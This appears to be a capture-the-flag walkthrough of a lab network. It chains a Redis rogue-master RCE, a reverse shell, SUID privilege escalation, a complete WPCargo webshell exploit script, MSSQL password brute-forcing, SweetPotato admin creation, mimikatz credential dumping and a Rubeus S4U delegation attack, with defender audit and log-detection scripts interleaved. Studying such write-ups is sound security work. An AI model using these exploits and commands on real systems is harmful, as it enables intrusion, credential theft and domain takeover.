Brute4Road

Getting a shell through Redis master-slave replication. The fscan scan showed port 6379 open, so Redis vulnerabilities were tried, and the master-slave replication RCE (https://github.com/n0b0dyCN/redis-rogue-server) turned out to be exploitable. How master-slave replication works: the master handles writes and the slave handles reads, splitting read and write traffic.
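What makes this path possible on the Redis side, as an added defender's check that is not part of the walkthrough or of redis-rogue-server: an audit of redis.conf for a network-reachable, unauthenticated instance on which the replication and MODULE commands are still enabled. Both sample configs are constructed.

```python
# Added defender-side example, not from the walkthrough or redis-rogue-server:
# audit a redis.conf for what the rogue-master RCE needs, i.e. an instance that is
# reachable from the network, needs no AUTH, and still accepts SLAVEOF/REPLICAOF
# and MODULE LOAD. Both sample configs below are constructed.
SAMPLE_EXPOSED = "bind 0.0.0.0\nprotected-mode no\n"
SAMPLE_HARDENED = """
bind 127.0.0.1 -::1
protected-mode yes
requirepass <strong-secret>
rename-command MODULE ""
rename-command SLAVEOF ""
rename-command REPLICAOF ""
rename-command CONFIG ""
rename-command DEBUG ""
"""
# Commands a rogue master relies on or that widen the blast radius. Disable
# SLAVEOF/REPLICAOF only on instances that are not legitimately replicas.
DANGEROUS_COMMANDS = ("slaveof", "replicaof", "module", "config", "debug")

def parse_conf(text: str) -> dict:
    """Return {directive: [argument lists]}; repeated directives accumulate."""
    conf = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if line:
            parts = line.split()
            conf.setdefault(parts[0].lower(), []).append(parts[1:])
    return conf

def audit_redis_conf(text: str) -> list:
    """Return human-readable findings; an empty list means nothing to fix."""
    conf = parse_conf(text)
    findings = []
    # Redis 7 bind syntax may prefix an optional address with "-"; strip it first.
    binds = [b.lstrip("-") for args in conf.get("bind", []) for b in args]
    if not binds or any(b in ("0.0.0.0", "*", "::") for b in binds):
        findings.append("bind: port reachable on all interfaces")
    if conf.get("protected-mode", [["yes"]])[-1] == ["no"]:
        findings.append("protected-mode no: unauthenticated remote clients accepted")
    if not conf.get("requirepass"):
        findings.append("requirepass unset: no AUTH required")
    # rename-command NAME "" removes the command; only that counts as disabled here.
    disabled = {args[0].lower() for args in conf.get("rename-command", [])
                if len(args) == 2 and args[1] in ('""', "''")}
    for cmd in DANGEROUS_COMMANDS:
        if cmd not in disabled:
            findings.append(f'{cmd.upper()} enabled (rename-command {cmd.upper()} "" disables it)')
    return findings
```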
Reference article on the Redis vulnerability family: https://www.freebuf.com/articles/web/249238.html. On the VPS, run:

Enter r to get a reverse shell.

Meanwhile have the VPS listen on another port to catch the reverse shell; once the shell comes back, spawn a pseudo-terminal:
```bash
python -c 'import pty; pty.spawn("/bin/bash")'
```
The flag is in /home/redis.

cat flag fails: insufficient permissions.

Privilege escalation: probe for SUID binaries

```bash
find / -user root -perm -4000 -print 2>/dev/null
```

base64 is on the list, so use it to read the file:

```bash
base64 "/home/redis/flag/flag01" | base64 --decode
```

This reveals the internal network segment.

Download fscan with wget and scan:
```
./fscan -h 172.22.2.0/24
Fscan Version: 2.0.0
[2025-03-04 21:17:06] [INFO] 暴力破解线程数: 1
[2025-03-04 21:17:06] [INFO] 开始信息扫描
[2025-03-04 21:17:06] [INFO] CIDR范围: 172.22.2.0-172.22.2.255
[2025-03-04 21:17:06] [INFO] 生成IP范围: 172.22.2.0.%!d(string=172.22.2.255) - %!s(MISSING).%!d(MISSING)
[2025-03-04 21:17:06] [INFO] 解析CIDR 172.22.2.0/24 -> IP范围 172.22.2.0-172.22.2.255
[2025-03-04 21:17:06] [INFO] 最终有效主机数量: 256
[2025-03-04 21:17:06] [INFO] 开始主机扫描
[2025-03-04 21:17:06] [INFO] 正在尝试无监听ICMP探测...
[2025-03-04 21:17:06] [INFO] 当前用户权限不足,无法发送ICMP包
[2025-03-04 21:17:06] [INFO] 切换为PING方式探测...
[2025-03-04 21:17:06] [SUCCESS] 目标 172.22.2.3 存活 (ICMP)
[2025-03-04 21:17:06] [SUCCESS] 目标 172.22.2.7 存活 (ICMP)
[2025-03-04 21:17:06] [SUCCESS] 目标 172.22.2.16 存活 (ICMP)
[2025-03-04 21:17:07] [SUCCESS] 目标 172.22.2.18 存活 (ICMP)
[2025-03-04 21:17:07] [SUCCESS] 目标 172.22.2.34 存活 (ICMP)
[2025-03-04 21:17:12] [INFO] 存活主机数量: 5
[2025-03-04 21:17:12] [INFO] 有效端口数量: 233
[2025-03-04 21:17:13] [SUCCESS] 端口开放 172.22.2.18:80
[2025-03-04 21:17:13] [SUCCESS] 端口开放 172.22.2.16:80
[2025-03-04 21:17:13] [SUCCESS] 端口开放 172.22.2.18:22
[2025-03-04 21:17:13] [SUCCESS] 端口开放 172.22.2.7:80
[2025-03-04 21:17:13] [SUCCESS] 端口开放 172.22.2.7:22
[2025-03-04 21:17:13] [SUCCESS] 端口开放 172.22.2.7:21
[2025-03-04 21:17:13] [SUCCESS] 端口开放 172.22.2.3:135
[2025-03-04 21:17:13] [SUCCESS] 端口开放 172.22.2.34:135
[2025-03-04 21:17:13] [SUCCESS] 端口开放 172.22.2.3:139
[2025-03-04 21:17:13] [SUCCESS] 端口开放 172.22.2.16:135
[2025-03-04 21:17:13] [SUCCESS] 端口开放 172.22.2.18:445
[2025-03-04 21:17:13] [SUCCESS] 端口开放 172.22.2.34:139
[2025-03-04 21:17:13] [SUCCESS] 端口开放 172.22.2.34:445
[2025-03-04 21:17:13] [SUCCESS] 端口开放 172.22.2.16:445
[2025-03-04 21:17:13] [SUCCESS] 端口开放 172.22.2.18:139
[2025-03-04 21:17:13] [SUCCESS] 端口开放 172.22.2.3:389
[2025-03-04 21:17:13] [SUCCESS] 端口开放 172.22.2.3:445
[2025-03-04 21:17:13] [SUCCESS] 端口开放 172.22.2.16:139
[2025-03-04 21:17:13] [SUCCESS] 端口开放 172.22.2.3:88
[2025-03-04 21:17:13] [SUCCESS] 端口开放 172.22.2.16:1433
[2025-03-04 21:17:13] [SUCCESS] 端口开放 172.22.2.7:6379
[2025-03-04 21:17:13] [SUCCESS] 服务识别 172.22.2.18:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.5 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.5.]
[2025-03-04 21:17:13] [SUCCESS] 服务识别 172.22.2.7:22 => [ssh] 版本:7.4 产品:OpenSSH 信息:protocol 2.0 Banner:[SSH-2.0-OpenSSH_7.4.]
[2025-03-04 21:17:13] [SUCCESS] 服务识别 172.22.2.7:21 => [ftp] 版本:3.0.2 产品:vsftpd 系统:Unix Banner:[220 (vsFTPd 3.0.2).]
[2025-03-04 21:17:18] [SUCCESS] 服务识别 172.22.2.16:80 => [http] 版本:2.0 产品:Microsoft HTTPAPI httpd 系统:Windows
[2025-03-04 21:17:18] [SUCCESS] 服务识别 172.22.2.7:80 => [http] 版本:1.20.1 产品:nginx
[2025-03-04 21:17:18] [SUCCESS] 服务识别 172.22.2.3:139 => Banner:[.]
[2025-03-04 21:17:18] [SUCCESS] 服务识别 172.22.2.34:139 => Banner:[.]
[2025-03-04 21:17:18] [SUCCESS] 服务识别 172.22.2.34:445 =>
[2025-03-04 21:17:18] [SUCCESS] 服务识别 172.22.2.16:445 =>
[2025-03-04 21:17:18] [SUCCESS] 服务识别 172.22.2.3:389 => [ldap] 产品:Microsoft Windows Active Directory LDAP 系统:Windows 信息:Domain: xiaorang.lab, Site: Default-First-Site-Name
[2025-03-04 21:17:18] [SUCCESS] 服务识别 172.22.2.3:445 =>
[2025-03-04 21:17:18] [SUCCESS] 服务识别 172.22.2.16:139 => Banner:[.]
[2025-03-04 21:17:19] [SUCCESS] 服务识别 172.22.2.3:88 =>
[2025-03-04 21:17:19] [SUCCESS] 服务识别 172.22.2.16:1433 => [ms-sql-s] 版本:13.00.4001; SP1 产品:Microsoft SQL Server 2016 系统:Windows Banner:[.%.]
[2025-03-04 21:17:20] [SUCCESS] 服务识别 172.22.2.18:80 => [http]
[2025-03-04 21:18:13] [SUCCESS] 服务识别 172.22.2.18:445 =>
[2025-03-04 21:18:13] [SUCCESS] 服务识别 172.22.2.18:139 =>
[2025-03-04 21:18:14] [SUCCESS] 服务识别 172.22.2.7:6379 =>
[2025-03-04 21:18:18] [SUCCESS] 服务识别 172.22.2.3:135 =>
[2025-03-04 21:18:18] [SUCCESS] 服务识别 172.22.2.34:135 =>
[2025-03-04 21:18:18] [SUCCESS] 服务识别 172.22.2.16:135 =>
[2025-03-04 21:18:18] [INFO] 存活端口数量: 21
[2025-03-04 21:18:18] [INFO] 开始漏洞扫描
[2025-03-04 21:18:18] [INFO] 加载的插件: findnet, ftp, ldap, ms17010, mssql, netbios, redis, smb, smb2, smbghost, ssh, webpoc, webtitle
[2025-03-04 21:18:18] [SUCCESS] NetInfo 扫描结果
目标主机: 172.22.2.16
主机名: MSSQLSERVER
发现的网络接口:
   IPv4地址:
      └─ 172.22.2.16
[2025-03-04 21:18:18] [SUCCESS] 网站标题 http://172.22.2.7 状态码:200 长度:4833 标题:Welcome to CentOS
[2025-03-04 21:18:18] [SUCCESS] 网站标题 http://172.22.2.16 状态码:404 长度:315 标题:Not Found
[2025-03-04 21:18:18] [SUCCESS] NetBios 172.22.2.34 XIAORANG\CLIENT01
[2025-03-04 21:18:18] [SUCCESS] NetInfo 扫描结果
目标主机: 172.22.2.34
主机名: CLIENT01
发现的网络接口:
   IPv4地址:
      └─ 172.22.2.34
[2025-03-04 21:18:18] [INFO] 系统信息 172.22.2.3 [Windows Server 2016 Datacenter 14393]
[2025-03-04 21:18:18] [INFO] 系统信息 172.22.2.16 [Windows Server 2016 Datacenter 14393]
[2025-03-04 21:18:18] [SUCCESS] NetBios 172.22.2.3 DC:DC.xiaorang.lab Windows Server 2016 Datacenter 14393
[2025-03-04 21:18:18] [SUCCESS] NetInfo 扫描结果
目标主机: 172.22.2.3
主机名: DC
发现的网络接口:
   IPv4地址:
      └─ 172.22.2.3
[2025-03-04 21:18:18] [SUCCESS] NetBios 172.22.2.16 MSSQLSERVER.xiaorang.lab Windows Server 2016 Datacenter 14393
[2025-03-04 21:18:18] [SUCCESS] 匿名登录成功!
[2025-03-04 21:18:18] [SUCCESS] NetBios 172.22.2.18 WORKGROUP\UBUNTU-WEB02
[2025-03-04 21:18:18] [SUCCESS] 172.22.2.34 CVE-2020-0796 SmbGhost Vulnerable
[2025-03-04 21:18:18] [SUCCESS] SMB认证成功 172.22.2.18:445 administrator:123456
[2025-03-04 21:18:18] [INFO] SMB2共享信息 172.22.2.18:445 administrator Pass:123456 共享:[print$ IPC$]
[2025-03-04 21:18:18] [SUCCESS] 网站标题 http://172.22.2.18 状态码:200 长度:57738 标题:又一个WordPress站点
[2025-03-04 21:18:20] [INFO] SMB2共享信息 172.22.2.16:445 admin Pass:123456 共享:[ADMIN$ C$ fileshare IPC$]
[2025-03-04 21:18:26] [SUCCESS] SMB认证成功 172.22.2.16:445 admin:123456
```
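Reading that output from the blue-team side, as an added example that is not part of the walkthrough or of fscan itself: a parser that turns fscan 2.0.0 log lines into a per-host inventory and ranks what to fix first (guessed credentials, unpatched CVEs, then exposed admin and database ports). The sample lines are constructed copies in the shape of the output above.

```python
import re

# Constructed sample: lines in the shape of the fscan 2.0.0 output above, not a new scan.
SAMPLE_FSCAN_OUTPUT = """\
[2025-03-04 21:17:13] [SUCCESS] 端口开放 172.22.2.18:80
[2025-03-04 21:17:13] [SUCCESS] 端口开放 172.22.2.7:6379
[2025-03-04 21:17:13] [SUCCESS] 端口开放 172.22.2.16:1433
[2025-03-04 21:17:13] [SUCCESS] 服务识别 172.22.2.7:21 => [ftp] 版本:3.0.2 产品:vsftpd 系统:Unix
[2025-03-04 21:18:18] [SUCCESS] 172.22.2.34 CVE-2020-0796 SmbGhost Vulnerable
[2025-03-04 21:18:18] [SUCCESS] SMB认证成功 172.22.2.18:445 administrator:123456
[2025-03-04 21:18:26] [SUCCESS] SMB认证成功 172.22.2.16:445 admin:123456
"""

LINE_RE = re.compile(r"^\[(?P<ts>[^\]]+)\] \[(?P<level>\w+)\] (?P<msg>.*)$")
PORT_RE = re.compile(r"^端口开放 (?P<ip>[\d.]+):(?P<port>\d+)$")
SERVICE_RE = re.compile(r"^服务识别 (?P<ip>[\d.]+):(?P<port>\d+) => (?P<detail>.*)$")
CRED_RE = re.compile(r"^(?P<proto>\S+?)认证成功 (?P<ip>[\d.]+):(?P<port>\d+) (?P<user>[^:]+):(?P<pw>.*)$")
CVE_RE = re.compile(r"^(?P<ip>[\d.]+) (?P<cve>CVE-\d{4}-\d+) .*Vulnerable$")
# Ports whose mere exposure on this segment is a finding (the ones the walkthrough went after).
RISKY_PORTS = {6379: "redis", 1433: "mssql", 445: "smb", 21: "ftp"}

def parse_fscan(text: str) -> dict:
    """Group log lines by host: {ip: {"ports": {port: service}, "weak_creds": [...], "cves": [...]}}."""
    hosts = {}
    def host(ip):
        return hosts.setdefault(ip, {"ports": {}, "weak_creds": [], "cves": []})
    for raw in text.splitlines():
        m = LINE_RE.match(raw.strip())
        if not m:
            continue  # banner and multi-line NetInfo blocks are skipped
        msg = m["msg"]
        if p := PORT_RE.match(msg):
            host(p["ip"])["ports"].setdefault(int(p["port"]), "")
        elif s := SERVICE_RE.match(msg):
            host(s["ip"])["ports"][int(s["port"])] = s["detail"]
        elif c := CRED_RE.match(msg):
            host(c["ip"])["weak_creds"].append((c["proto"].lower(), c["user"], c["pw"]))
        elif v := CVE_RE.match(msg):
            host(v["ip"])["cves"].append(v["cve"])
    return hosts

def triage(hosts: dict) -> list:
    """Rank findings: guessed credentials and unpatched CVEs first, then exposed admin/db ports."""
    out = []
    for ip, h in hosts.items():
        out += [(ip, "critical", f"weak {proto} credential: {user}") for proto, user, _ in h["weak_creds"]]
        out += [(ip, "critical", f"{cve} unpatched") for cve in h["cves"]]
        out += [(ip, "high", f"{RISKY_PORTS[p]} exposed on {p}") for p in sorted(h["ports"]) if p in RISKY_PORTS]
    return sorted(out, key=lambda f: (f[1] != "critical", f[0]))
```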
Setting up a Stowaway proxy

On the VPS:

```bash
./linux_x64_admin --heartbeat -l 61032 -s aab32
```

On the compromised host (the machine we have a shell on), start the agent:

```bash
./linux_x64_agent -c <VPS IP>:61032 -s aab32
```

Once the connection is up, select the node that checked in on the admin side and run the socks command:

```
use 0
# socks <port> <username> <password>
socks 55667 username password
```

Now socks5://username:password@<VPS IP>:55667 proxies into the internal network behind the compromised host.

Using the username and password with the proxy didn't work; dropping them did.

```bash
proxychains wpscan --url http://172.22.2.18
```
Searching online turned up an article on the relevant RCE, with an exploit script:
https://wpscan.com/vulnerability/5c21ad35-b2fb-4a51-858f-8ffff685de4a/
```python
import sys
import binascii
import requests

# This is a magic string that when treated as pixels and compressed using the png
# algorithm, will cause <?=$_GET[1]($_POST[2]);?> to be written to the png file
payload = '2f49cf97546f2c24152b216712546f112e29152b1967226b6f5f50'


def encode_character_code(c: int):
    return '{:08b}'.format(c).replace('0', 'x')


text = ''.join([encode_character_code(c) for c in binascii.unhexlify(payload)])[1:]

destination_url = 'http://172.22.2.18/'
cmd = 'ls'

# With 1/11 scale, '1's will be encoded as single white pixels, 'x's as single black pixels.
requests.get(
    f"{destination_url}wp-content/plugins/wpcargo/includes/barcode.php?text={text}&sizefactor=.090909090909&size=1&filepath=/var/www/html/webshell.php"
)

# We have uploaded a webshell - now let's use it to execute a command.
print(requests.post(
    f"{destination_url}webshell.php?1=system",
    data={"2": cmd}
).content.decode('ascii', 'ignore'))
```
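Spotting this on the server side, as an added example that is not from the advisory or the walkthrough: it scans constructed Apache-style access-log lines for barcode.php requests whose filepath parameter points at a PHP file (or escapes with ..), and then flags any later request to the file that call wrote. It assumes the site's document root is /var/www/html.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

DOCROOT = "/var/www/html"  # assumption: document root of the WordPress site
BARCODE_PATH = "/wp-content/plugins/wpcargo/includes/barcode.php"
REQ_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\w+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# Constructed access-log lines (common log format), not captured traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [04/Mar/2025:21:30:01 +0800] "GET /wp-content/plugins/wpcargo/includes/barcode.php?text=1x1x1x&sizefactor=.090909090909&size=1&filepath=/var/www/html/webshell.php HTTP/1.1" 200 143
10.0.0.5 - - [04/Mar/2025:21:30:02 +0800] "POST /webshell.php?1=system HTTP/1.1" 200 512
10.0.0.9 - - [04/Mar/2025:21:31:10 +0800] "GET /wp-content/plugins/wpcargo/includes/barcode.php?text=ABC123&size=2 HTTP/1.1" 200 902
10.0.0.9 - - [04/Mar/2025:21:31:11 +0800] "GET /index.php HTTP/1.1" 200 57738
"""

def scan_log(text: str) -> list:
    """Return [(client_ip, severity, reason)]. Two signals are correlated across lines:
    1. barcode.php called with a filepath ending in a PHP extension or containing '..'
       (the plugin lets the caller choose where the generated PNG is written);
    2. any later request to a path that such a call wrote under DOCROOT."""
    alerts, planted = [], set()
    for line in text.splitlines():
        m = REQ_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        qs = {k: v[-1] for k, v in parse_qs(url.query, keep_blank_values=True).items()}
        if url.path.endswith(BARCODE_PATH) and "filepath" in qs:
            target = unquote(qs["filepath"])
            if target.lower().endswith((".php", ".phtml", ".phar")) or ".." in target.split("/"):
                alerts.append((m["ip"], "critical", f"barcode.php writes {target}"))
                if target.startswith(DOCROOT + "/"):
                    planted.add(target[len(DOCROOT):])  # web path the caller can now request
            else:
                alerts.append((m["ip"], "medium", f"barcode.php filepath override: {target}"))
        elif url.path in planted:
            alerts.append((m["ip"], "critical", f"request to file planted via barcode.php: {url.path}"))
    return alerts
```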
Run the whole thing in one go.

Connect with AntSword.

The config file stands out; open it to get the database user and password.

We see the database password.

Connect to the database.

Brute force: a password table was found; export it.

Back to the earlier fscan results: port 1433 is also open, so brute-force 172.22.2.16:1433 with that password list.

```
fscan -h 172.22.2.16 -m mssql -pwdf 1.txt
[+] mssql:172.22.2.16:1433:sa ElGNkOiC
```
Something in the environment misbehaved here, so pwncat was used; after the shell comes in it drops into pwncat's terminal mode, and typing back returns to the shell.

Use MDUT.

SweetPotato privilege escalation:

```
C:/Users/Public/SweetPotato-Webshell-new.exe -a "net user test qwer1234! /add"
C:/Users/Public/SweetPotato-Webshell-new.exe -a "net localgroup administrators test /add"
```

RDP in.

The flag is in the user's directory.

Domain penetration: the host is domain-joined. Upload mimikatz to dump hashes, running it as administrator:

```
privilege::debug
sekurlsa::logonpasswords
```

Adinfo is used here (https://github.com/lzzbb/Adinfo/releases):

```
.\Adinfo_win.exe -d xiaorang.lab --dc 172.22.2.3 -u MSSQLSERVER$ -H 26c5767767ddac88dfccd8449fc11502
```
Constrained delegation found.

MSSQLSERVER has constrained delegation configured to the domain controller, so a high-privilege ST can be forged through S4U to take the DC. Use Rubeus to request a ticket for the account itself:

```
.\Rubeus.exe asktgt /user:MSSQLSERVER$ /rc4:26c5767767ddac88dfccd8449fc11502 /domain:xiaorang.lab /dc:DC.xiaorang.lab /nowrap
```

Then inject the ticket:

```
.\Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:CIFS/DC.xiaorang.lab /dc:DC.xiaorang.lab /ptt /ticket:<base64 TGT from the asktgt step>
```

Then access the flag file on the domain controller.
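The defender's view of what Adinfo surfaced, as an added example that is not from the walkthrough or from Adinfo: an audit of delegation attributes exported from AD for the settings behind the S4U path above (constrained delegation to a DC service, protocol transition, unconstrained delegation, and privileged accounts not marked sensitive). The objects, DC list and privileged-user list are constructed inputs; the account names come from the walkthrough, the userAccountControl values are assumed.

```python
# Added defender-side example, not from the walkthrough or Adinfo: audit the
# delegation attributes behind the S4U path above. The objects are constructed
# (names from the walkthrough, userAccountControl values assumed), not real AD data.
TRUSTED_FOR_DELEGATION = 0x80000            # unconstrained delegation
NOT_DELEGATED = 0x100000                    # "account is sensitive and cannot be delegated"
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # constrained delegation with protocol transition

SAMPLE_OBJECTS = [
    {"sAMAccountName": "MSSQLSERVER$", "userAccountControl": 0x1001000,
     "msDS-AllowedToDelegateTo": ["CIFS/DC.xiaorang.lab", "CIFS/DC"]},
    {"sAMAccountName": "CLIENT01$", "userAccountControl": 0x1000, "msDS-AllowedToDelegateTo": []},
    {"sAMAccountName": "Administrator", "userAccountControl": 0x200, "msDS-AllowedToDelegateTo": []},
]

def audit_delegation(objects: list, domain_controllers: list, privileged_users: list) -> list:
    """Return [(account, severity, finding)] for every delegation setting worth reviewing."""
    dcs = {d.lower() for d in domain_controllers}
    privileged = {p.lower() for p in privileged_users}
    findings = []
    for obj in objects:
        name = obj["sAMAccountName"]
        uac = obj.get("userAccountControl", 0)
        if uac & TRUSTED_FOR_DELEGATION:
            findings.append((name, "critical", "unconstrained delegation enabled"))
        transition = bool(uac & TRUSTED_TO_AUTH_FOR_DELEGATION)
        for spn in obj.get("msDS-AllowedToDelegateTo") or []:
            _, _, host = spn.partition("/")
            host = host.split(":")[0].lower()
            # A front end allowed to delegate to a DC service can obtain tickets to that
            # service on behalf of users; with protocol transition it can do so for a user
            # who never authenticated to it, which is what the S4U2Self + S4U2Proxy chain needs.
            severity = "critical" if host in dcs else "medium"
            detail = f"constrained delegation to {spn}" + (" with protocol transition" if transition else "")
            findings.append((name, severity, detail))
        if name.lower() in privileged and not (uac & NOT_DELEGATED):
            findings.append((name, "high", "privileged account lacks NOT_DELEGATED (can be impersonated via S4U)"))
    return findings
```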
Reference: https://forum.butian.net/share/1591